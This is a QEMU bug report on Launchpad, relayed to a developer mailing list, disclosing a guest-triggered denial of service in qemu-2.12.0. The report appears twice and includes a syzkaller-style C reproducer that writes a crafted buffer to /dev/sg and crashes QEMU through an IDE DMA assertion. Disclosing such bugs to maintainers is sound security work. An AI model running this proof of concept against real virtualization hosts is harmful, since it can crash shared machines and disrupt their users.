Public bug reported: Hi, QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0: #define _GNU_SOURCE #include <endian.h> #include <sys/syscall.h> #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <sys/stat.h> #include <stdint.h> #include <string.h> static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2) { if (a0 == 0xc || a0 == 0xb) { char buf[128]; sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2); return open(buf, O_RDWR, 0); } else { char buf[1024]; char* hash; strncpy(buf, (char*)a0, sizeof(buf) - 1); buf[sizeof(buf) - 1] = 0; while ((hash = strchr(buf, '#'))) { *hash = '0' + (char)(a1 % 10); a1 /= 10; } return open(buf, a2, 0); } } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; void loop() { long res = 0; memcpy((void*)0x20000000, "/dev/sg#", 9); res = syz_open_dev(0x20000000, 0, 2); if (res != -1) r[0] = res; res = syscall(__NR_dup2, r[0], r[0]); if (res != -1) r[1] = res; *(uint8_t*)0x20000ec0 = 0; *(uint8_t*)0x20000ec1 = 0; *(uint8_t*)0x20000ec2 = 0; *(uint8_t*)0x20000ec3 = 0; *(uint32_t*)0x20000ec8 = 0; *(uint8_t*)0x20000ed8 = 0; *(uint8_t*)0x20000ed9 = 0; *(uint8_t*)0x20000eda = 0; *(uint8_t*)0x20000edb = 0; memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12); syscall(__NR_write, r[1], 0x20000ec0, 0x323); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); loop(); return 0; } this will crash qemu, output information: qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed. Thanks owl337 ** Affects: qemu Importance: Undecided Assignee: icytxw (icytxw) Status: New ** Changed in: qemu Assignee: (unassigned) => icytxw (icytxw) -- You received this bug notification because you are a member of qemu- devel-ml, which is subscribed to QEMU. https://bugs.launchpad.net/bugs/1777315 Title: Denial of service Status in QEMU: New Bug description: Hi, QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0 run the program in qemu-2.12.0: #define _GNU_SOURCE #include <endian.h> #include <sys/syscall.h> #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <sys/stat.h> #include <stdint.h> #include <string.h> static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2) { if (a0 == 0xc || a0 == 0xb) { char buf[128]; sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2); return open(buf, O_RDWR, 0); } else { char buf[1024]; char* hash; strncpy(buf, (char*)a0, sizeof(buf) - 1); buf[sizeof(buf) - 1] = 0; while ((hash = strchr(buf, '#'))) { *hash = '0' + (char)(a1 % 10); a1 /= 10; } return open(buf, a2, 0); } } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; void loop() { long res = 0; memcpy((void*)0x20000000, "/dev/sg#", 9); res = syz_open_dev(0x20000000, 0, 2); if (res != -1) r[0] = res; res = syscall(__NR_dup2, r[0], r[0]); if (res != -1) r[1] = res; *(uint8_t*)0x20000ec0 = 0; *(uint8_t*)0x20000ec1 = 0; *(uint8_t*)0x20000ec2 = 0; *(uint8_t*)0x20000ec3 = 0; *(uint32_t*)0x20000ec8 = 0; *(uint8_t*)0x20000ed8 = 0; *(uint8_t*)0x20000ed9 = 0; *(uint8_t*)0x20000eda = 0; *(uint8_t*)0x20000edb = 0; memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12); syscall(__NR_write, r[1], 0x20000ec0, 0x323); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); loop(); return 0; } this will crash qemu, output information: qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed. Thanks owl337 To manage notifications about this bug go to: https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions